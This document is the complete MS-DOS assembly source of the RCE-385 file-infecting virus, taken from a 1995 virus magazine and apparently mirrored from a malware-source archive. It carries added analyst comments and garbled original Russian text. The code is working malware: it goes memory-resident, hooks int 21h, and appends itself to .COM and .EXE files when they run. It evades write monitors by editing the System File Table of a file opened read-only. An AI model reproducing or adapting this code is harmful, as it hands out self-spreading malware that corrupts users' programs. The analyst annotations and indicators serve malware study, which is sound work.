mirror of https://github.com/vxunderground/MalwareSourceCode synced 2024-07-05 09:52:02 +00:00
vxug-MalwareSourceCode/MSDOS/Virus.MSDOS.Unknown.rce.asm

;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20> <20> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
;<3B> STEALTH group ۰ <20> <20><><EFBFBD> <20><><EFBFBD> <20><><EFBFBD> <20><><EFBFBD> <20><><EFBFBD> <20><><EFBFBD> <20><><EFBFBD> <20> <20> <20><><EFBFBD> <20> <20><><EFBFBD> <20><><EFBFBD> <20><> <20><> <20><>
;<3B> presents ۰ <20> <20> <20> <20><> <20><> <20> <20> <20><> <20> <20> <20> <20> <20> <20> <20> <20> <20><><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD> <20><>
;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>۰ <20> <20> <20> <20> <20><><EFBFBD> <20><><EFBFBD> <20> <20><><EFBFBD> <20><><EFBFBD> <20><> <20><><EFBFBD> <20> <20><><EFBFBD> <20><><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> JAN 1995
;
; INFECTED VOICE. Issue 4. January 1995. (C) STEALTH group, Kiev 148, Box 10.
; THE FIRST UNIQUE VIRUS MAGAZINE IN FORMER U.S.S.R.!!!
;
;--- RCE-385 (!).-------------------------------------------------------------
; <20><><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><EFBFBD><E0A5AC><EFBFBD> <20><>諨 - <20><><EFBFBD><EFBFBD><EFA2A8><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><20><><EFBFBD><EFBFBD><E2AEA2> <20> <20><><EFBFBD><EFBFBD>ᠫ ᢮<>
;<3B><><EFBFBD>⮢᪨ <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> AdInf -> <20><> <20> <20><><EFBFBD> <20><><><E2A5AF><EFBFBD>?<3F>-<2D><>,⥯<><E2A5AF><EFBFBD><><E1A8A4> <20><> <20><><EFBFBD><E5ADAE><EFBFBD><EFBFBD><EFBFBD>
;<3B> <20><EFBFBD><E2A5AD><EFBFBD> <20><><20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><EFBFBD><E0A5AC><EFBFBD><EFBFBD>,<2C><><EFBFBD><EFBFBD><EFBFBD> <20><><EEA7A5><><E6A5AB> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><> <20><><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD>,
;<3B> <20><> - <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>,<2C><><EFBFBD> <20><><EFBFBD>,<2C><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>,<2C><><EFBFBD> <20><><EFBFBD><EFBFBD><><E2A0AA> <20><><EFBFBD><20> RAM<41>.
; <20><><E2A5AF><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><E2A0A2><EFBFBD> <20><EFBFBD><20><><EFBFBD> - <20><><EFBFBD><EFBFBD> <20><><EFBFBD>,<2C><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>!<21><><EFBFBD><EFBFBD> <20><EFBFBD><E2A5AB>
;<3B><EFBFBD><E0A8A7><EFBFBD><E3ACA0><EFBFBD><EFBFBD> : "<22><> <20><><EFBFBD> <20><><><E1A4A5><><><><EFBFBD><EBA2A0>,<2C><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD> *beep <20>
;*beep".<2E> <20> <20><><EFBFBD> <20><><EFBFBD> <20><>襫 ࠧ<><E0A0A7><EFBFBD> <20> <20><EFBFBD> <20><><EFBFBD><E0ACA0><EFBFBD>.<2E><><EFBFBD> <20><EFBFBD><E0A5A4><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><20> <20><><EFBFBD><EFBFBD>饭-
;<3B><><EFBFBD> <><E0A5A6> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20> ⥬ ᠬ<><E1A0AC> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EBA2A0><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>,<2C> <20><><EFBFBD> <20><> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><E8A5A2><EFBFBD>
;<3B><><EFBFBD><EFBFBD> <20><><EFBFBD><><20><><EFBFBD><E2A5AA><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>,<2C><><EFBFBD> <20><><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>,<2C><><EFBFBD> <20><><EFBFBD><EFBFBD>
;<3B><> *beep <20><><EFBFBD><EFBFBD><E1AAA0>!<21><> <20><><EFBFBD> <20><><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> *beep<65><70>!<21><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><E8A0A9> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><E0ACA0> --
;<3B><> <20> <20><><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>,<2C> <20> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>⬠!!!<21><><20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFAAA8>
;ॢ<><E0A5A2><EFBFBD><EFBFBD>,<2C><><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><E0ACA0><EFBFBD><><> <20><><EFBFBD><EFBFBD><EFBFBD>.<2E><><20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> ஢!
;(<28><><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><> <20><><EFBFBD> <20><><EFBFBD> <20><> <20><><EFBFBD><EFBFBD><EFBFBD>뫨 Basic).<2E> <20><><EFBFBD><E7A8AB> <20><><EFBFBD> - <20><><EFBFBD> <20><><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD>
;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>,<2C><><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD> "<22><><EFBFBD><E1A0A4>"!
; <20><><20><><EFBFBD><><E6A2A5><EFBFBD><E7AAA0> <20><><EFBFBD><EFBFBD><EBA2A0><EFBFBD><EFBFBD>!<21> <20><><EFBFBD> <20><EFBFBD><EFBFBD><E2A0A2><>,<2C><><EFBFBD> <20><><EFBFBD><EFBFBD><E8ABA5><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD>
;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><> <20><EFBFBD><E0AEA8><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>,<2C> <20><><EFBFBD> <20> <20><><EFBFBD><EFBFBD> <20><> ⥮ਨ <20><> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
;<3B><><EFBFBD><EFBFBD>襩-<2D><><EFBFBD><E0ACA0><EFBFBD>!<21><><EFBFBD> <20> <20><><EFBFBD><EFBFBD><E8ABAE> <20><><EFBFBD> <20><><EFBFBD><EFBFBD><E2A0A2><EFBFBD><EFBFBD> <20><><EFBFBD><E1AEA1>-<2D><><EFBFBD>-<2D><><EFBFBD><E7A8AD><EFBFBD><EFBFBD><EFBFBD>.
;<3B><><EFBFBD> <20><><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD> RCE-666 (<28><><EFBFBD><EFBFBD> <20><>ᠭ).Aidstest <20><><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>: INFO /666,Web: Die-666.
;<3B><> <20><><20><><EFBFBD><E0A5A7> <20><><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD>쪮,<2C><><EFBFBD><EFBFBD><20> RCE-385!
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>,<2C><><EFBFBD> <20><> <20><><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD>- <20><EFBFBD><E7A5A1><EFBFBD><EFBFBD><EFBFBD> <20><EFBFBD><E2A0AD>,<2C> <20><><EFBFBD> <20><><EFBFBD> <20><><EFBFBD><EFBFBD>஢ - <20><><EFBFBD>⮩-
;<3B><><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>!
;-----------------------------------------------------------------------------
;(c) Light General.Kiev.1995. STEALTH group . For free use!
;-----------------------------------------------------------------------------
; Segment setup and first-generation carrier program (TASM/MASM-style syntax,
; 16-bit DOS .COM layout: code starts at offset 100h).
; The carrier is laid out like a .COM file this sample has already patched:
; byte 0 is a NOP (90h), followed by a near JMP to the appended body at virr.
cseg segment
assume cs:cseg,ds:cseg
org 100h
start:
nop ; 90h in byte 0: the value the infection routine tests for before touching a .COM file
jmp virr
; Carrier payload: prints the string below and terminates.
; It runs after the body at virr has rewritten the first four bytes at 100h.
nop
nop
mov ah,09 ; DOS: print '$'-terminated string at DS:DX
lea dx,wrn
int 21h
mov ax,4c00h ; DOS: terminate, exit code 0
int 21h
;--------------------------------------
wrn db 'FRODO LIVES!$'
;--------------------------------------
;################# VIRUS ##################
; virr: entry point of the appended body.
; Flow visible in this block:
;   1. compute the body's run-time offset into SI;
;   2. probe for a resident copy (int 21h, AX=0FEFEh; a resident copy answers with CF set);
;   3. if none answers, cut 35 paragraphs off the top of the host's memory block,
;      copy the body there and hook int 21h from that copy.
; Analyst notes: the AX=0FEFEh probe and the lowered MCB size / PSP memory-top
; values are the memory-resident indicators of this sample.
virr:
call $+3 ; pushes the address of the next instruction
pop si
sub si,03 ; SI = run-time offset of virr (the call is 3 bytes long)
;-Hacked mem.-----------------------------------------------------
push si ; kept for the host-restore code at exit_v
clc
mov ax,0FEFEh ; residency probe: int_21h_entry answers this value
int 21h ; by returning with CF set
jc exit_v ; already resident -> skip installation
;- Memory reservation ---------------------------------------------
; The original commentary (mis-encoded in this copy) describes two DOS
; structures. Fields recoverable from it and used by the code:
;   MCB (memory control block, the paragraph just below the PSP):
;     +00 byte  'M', or 'Z' for the last block
;     +01 word  owner
;     +03 word  block size in paragraphs (16 bytes each)   <- decreased below
;   PSP (program segment prefix):
;     +00 word  int 20h (CD 20h)
;     +02 word  segment just past the memory given to the program   <- decreased below
mov ax,ds
dec ax
mov es,ax ; ES = DS-1, treated as the MCB (DS is taken to be the PSP)
sub word ptr es:[03],35 ; MCB size field -= 35 paragraphs (560 bytes)
sub word ptr ds:[02],35 ; PSP memory-top field -= 35 paragraphs
mov es,ds:[02] ; ES = segment of the area just cut off
push ds cs
pop ds ; DS = CS; the original DS stays on the stack
xor di,di
mov cx,offset ax_len-offset virr ; number of body bytes to copy
rep movsb ; copy the running body (DS:SI) to ES:0
;-Install int.----------------------------------------------------
mov al,21h ; vector number
mov dx,offset int_21h_entry-offset virr ; handler offset inside the copy
mov si,offset ofs_21h-offset virr ; slot for the previous vector
push es
pop ds ; DS = segment of the copy
call inst_int ; store the old int 21h vector in the copy and
; point int 21h at int_21h_entry there
pop ds ; restore the DS saved by "push ds cs"
; exit_v: hand control back to the host program.
; The second byte of the saved header decides the path: 'Z' (from an "MZ"
; header) goes to L_exe, anything else is handled as a .COM image.
exit_v:
push ds
pop es ; ES = DS
pop si ; SI = run-time offset of virr (pushed at entry)
;- COM or EXE ?---------------------------------------------------
cmp byte ptr cs:[si+offset origin_2_byte-offset virr+1],'Z'
jz L_exe
;- .COM host: put the saved bytes back ----------------------------
; The first four bytes of the host were replaced on disk; the saved originals
; are copied back to offset 100h in memory before the host runs.
mov di,100h
add si,offset origin_2_byte-offset virr
; SI = saved original bytes
push di ; return address = 100h
movsw
movsw ; 4 bytes restored
xor ax,ax
ret ; Go to infected com program.
;-Loaded from exe file.--------------------------------------------
; .EXE host: the stored entry point is relocated and jumped to.
; The original commentary cites a book reference for the EXE header layout
; (text mis-encoded in this copy).
L_exe:
mov ax,es
add ax,10h ; ES+10h; ES was copied from DS at exit_v (presumably the PSP, making this the load segment - confirm)
add cs:[offset CS_file-offset virr][si],ax
; the add above patches the segment operand of the far jump below (self-modifying code)
db 0eah ;- opcode of JMP FAR ptr16:16
IP_file dw ? ;- JMP Far CS_file:IP_file
CS_file dw ? ;-
;------------------------------------------------------------------
; The resident int 21h handler follows.
; int_21h_entry: resident int 21h filter installed by the code at virr.
;   AX=0FEFEh -> residency probe: return to the caller with CF set.
;   AX=4B00h  -> (DOS load-and-execute) go to infecting.
;   otherwise -> far jump to the previous int 21h handler.
; exit_date / exit_close / exit_pop form the common exit path of the infection
; routine and fall through into exit_all.
; int_24h_entry shares the tail of the probe path and is the address installed
; as the temporary int 24h (critical error) handler.
int_21h_entry proc
cmp ax,0FEFEh ;- residency probe?
jnz _@1 ;-
stc ;- CF=1 is the "already resident" answer
int_24h_entry:
mov al,03 ; as int 24h handler: AL=3 (DOS "fail the call" response)
retf 2 ; far return that drops the stacked flags, so the current flags reach the caller
_@1:
cmp ax,4b00h ; program about to be executed?
jnz exit_all ; no -> pass the call through unchanged
jmp infecting ;
exit_date:
mov ax,5701h ; DOS: set file date/time on handle BX
mov cx,es:[di+13] ;<- Time
mov dx,es:[di+15] ;<- Date
; the values come from the SFT entry at ES:DI, so the timestamp presumably stays as it was - confirm
int 21h
exit_close:
mov ah,3eh ; DOS: close handle BX
int 21h
exit_pop:
lds dx,cs:[offset ofs_24h-offset virr] ; DS:DX = value held in ofs_24h/seg_24h
mov ax,2524h ; DOS: set int 24h vector to DS:DX
int 21h
pop bp ; registers pushed at infecting, in reverse order
pop ds
pop es
pop di
pop si
pop dx
pop cx
pop bx
pop ax
exit_all:
db 0eah ; opcode of JMP FAR; its operand is the previous int 21h vector stored by inst_int
ofs_21h dw 0000
seg_21h dw 0000
int_21h_entry endp
;-------------------------------------------------------------------
; infecting: entered from int_21h_entry on AX=4B00h; DS:DX is the program path
; supplied by the caller of the exec request.
; This block saves the caller's registers, calls inst_int for int 24h, opens
; the file read-only and reads its first 18h bytes into the header buffer.
infecting:
push ax
push bx
push cx
push dx
push si
push di
push es
push ds
push bp
push ds ; second copy of DS:DX (path), popped again after inst_int
push dx
;------------------------------------------------------------------
; Temporary int 24h handler. The original note mentions the DOS
; "Write protect error ..." prompt; int_24h_entry answers critical errors
; itself instead of letting DOS show that prompt.
; inst_int is called with AL=24h, SI=offset of the ofs_24h slot, DX=handler offset.
mov al,24h
mov si,offset ofs_24h-offset virr
mov dx,offset int_24h_entry-offset virr
call inst_int
pop dx
pop ds
;-Open file...-----------------------------------------------------
mov ax,3d00h ; DOS: open, access mode 0 (read-only)
int 21h
jc exit_pop
;-Read header (EXE) or first 4 byte (COM).-------------------------
mov bh,3fh
xchg ax,bx ; BX = handle, AH = 3Fh (DOS: read)
mov cx,18h ; 24 bytes
push cs
pop ds
mov dx,offset origin_2_byte-offset virr ; buffer inside the resident copy
mov si,dx
int 21h ; read the first 24 bytes of the file
_1:
jc exit_close ; read failed -> close and leave
;-Look SFT file!-----------------------------
; The handle was opened read-only. Instead of reopening it for writing, the
; code edits the handle's System File Table (SFT) entry directly.
; Analyst note: a monitor that only inspects open requests for write access
; sees a read-only open here, while the later write requests go through the
; same handle.
; The original commentary (mis-encoded in this copy) cites a reference book
; and RC-0-512 ("666, Written by Dark Avenger") as prior use of the technique.
; SFT entry fields used by the code (decimal offsets, as in the original table):
;   +02 byte  open mode
;   +13 word  time of last modification
;   +15 word  date of last modification
;   +17 dword file size
;   +21 dword current file position
; The original table also lists +00, +04, +11 and +32 (11-byte name without '.').
mov ax,1220h ; int 2Fh AX=1220h: job-file-table byte for handle BX -> ES:DI
push bx
int 2fh ;
mov bl,es:[di] ; BL = SFT index stored for that handle
mov ax,1216h ; int 2Fh AX=1216h: SFT entry for index BX -> ES:DI
int 2fh ;
pop bx ; BX = file handle again
mov byte ptr es:[di+2],02 ; SFT open mode := 2 (read/write)
mov bp,es:[di+17] ; BP = file len! (low word of the size field)
;---------------------------------------------
; Classify the file by the first byte just read.
lodsb ; AL = first byte of the header buffer
dec si ; SI back to the start of the buffer
cmp al,'M' ; "MZ" signature -> treat as .EXE
jz _EXE
cmp al,90h ; NOP in byte 0 = this sample's own .COM marker
_1d:
jz exit_close ; already marked -> leave the file alone
;-Infect .COM --------------------------------
; .COM path: the body is appended at end of file and the first four bytes are
; replaced by NOP + near JMP to it.
; On-disk indicator for .COM files: bytes 90h E9h nn nn at offset 0, where
; nn = (original file length - 4).
xchg ax,bp ; AX = file length taken from the SFT
cmp ax,65000
ja exit_close ; longer than 65000 bytes -> skip
mov es:[di+21],ax ; SFT file position := file length (end of file)
;-Make JMP------------------------------------
; The JMP occupies offsets 1..3, so its displacement is counted from offset 4.
sub ax,04
mov ds:[offset jmp_n-offset virr],ax
call write_virus ; append the body; on return the file position is 0
mov cx,04h ; 4 bytes: new_3_byte .. jmp_n
mov dx,offset new_3_byte-offset virr
exit_write:
mov ah,40h ; DOS: write CX bytes from DS:DX to handle BX
int 21h
_1b: jmp exit_date
;-Sub. for write virus body (only) in file.----
; write_virus: writes (ax_len - virr) bytes from DS:0 to handle BX, then sets
; the SFT file position (ES:[DI+21] / ES:[DI+23]) to 0.
; In:    BX = handle, DS = segment whose offset 0 holds the body, ES:DI = SFT entry.
; Out:   returns normally when the byte count reported by DOS equals the count
;        requested; otherwise drops its return address and leaves via _1b (exit_date).
; Clobb: AX, CX, DX, flags.
write_virus proc
xor dx,dx ; DX = 0: buffer offset, reused below as the zero file position
mov ah,40h ; DOS: write
mov cx,offset ax_len-offset virr
int 21h
mov es:[di+21],dx ; F.P = start file!
mov es:[di+23],dx
cmp ax,cx ; bytes written == bytes requested?
jnz _1c
ret
_1c:
pop ax ; discard the return address
jmp _1b ; exit_date!
write_virus endp
;-Infect .EXE ---------------------------------
; .EXE path. SI points at the 18h-byte header copy read earlier.
; Header fields used (offsets as in the code):
;   +02 bytes in last page     +04 page count (512-byte pages)
;   +08 header size in paragraphs
;   +14h initial IP            +16h initial CS
_EXE:
; Files whose header-declared length differs from the length held in the SFT
; are skipped (the original note calls these overlays).
mov ax,ds:[si+4] ; Pages (512b).
dec ax
mov cx,512
mul cx
add ax,[si+2] ; AX = File len from header.
cmp ax,bp ; Real file len = ax ?
jnz _1b ; No - this is overlay.
;-----
mov es:[di+21],ax ; SFT file position := DX:AX (header-declared length)
mov es:[di+23],dx
;-Get header.-----------------------------------
; Keep the host's entry point in IP_file/CS_file for the far jump at L_exe.
mov ax,[si+14h]
mov ds:[offset IP_file-offset virr],ax
mov ax,[si+16h]
mov ds:[offset CS_file-offset virr],ax
;-----------------------------------------------
; New entry point derived from the file length: quotient and remainder of
; length / 16, less the header size in paragraphs.
xchg ax,bp ; AX = file length (low word); DX still holds the high word from the mul
mov cx,10h
div cx
sub ax,[si+8]
sbb dx,0
mov [si+16h],ax ; ReloCS.
mov [si+14h],dx ; ExeIP.
;-Correcting file len in header.----------------
; The page count is raised by one (512 bytes) while the original note gives the
; body length as 385 bytes, so the header-declared length and the on-disk
; length differ afterwards; such a file no longer passes the length comparison
; at the top of this block.
inc word ptr ds:[si+4]
;-Write virus to file.--------------------------
call write_virus
;-Write new header.-----------------------------
mov cx,18h
mov dx,si ; DX = offset header.
jmp exit_write ; write the header at file offset 0, then leave via exit_date
;----------------------------------------------
; inst_int: store the current handler of interrupt AL and install a new one.
; In:    AL = interrupt number, DS:SI = 4-byte slot for the old vector,
;        DS:DX = new handler.
; Out:   old vector stored at DS:[SI] (offset) and DS:[SI+2] (segment).
; Clobb: AH, BX, ES (DOS function 35h returns the vector in ES:BX).
inst_int proc
mov ah,35h ; DOS: get vector AL -> ES:BX
int 21h
mov ds:[si],bx
mov ds:[si+2],es
mov ah,25h ; DOS: set vector AL to DS:DX
int 21h
ret
inst_int endp
; Four bytes written over the start of a .COM file: NOP, then a near JMP whose
; 16-bit displacement (jmp_n) is filled in at run time.
new_3_byte db 90h ; NOP
db 0e9h ; JMP nn
jmp_n dw 0000 ; nn
;-Header for EXE file & buffer for first 5 bytes COM's file.--
; Read buffer for the first 18h bytes of the target file. ax_len marks the end
; of the region that is copied to memory and written to files
; (length = ax_len - virr).
origin_2_byte:
header:
db 4 dup (90h) ; NOPs
ax_len db ?
db 20h dup (?) ; For EXE header.
; Slot for the int 24h vector that exit_pop loads and re-installs.
ofs_24h dw ?
seg_24h dw ?
;********************************************************
cseg ends
end start
;-- Written by Light General.Kiev.1995.For free use! ----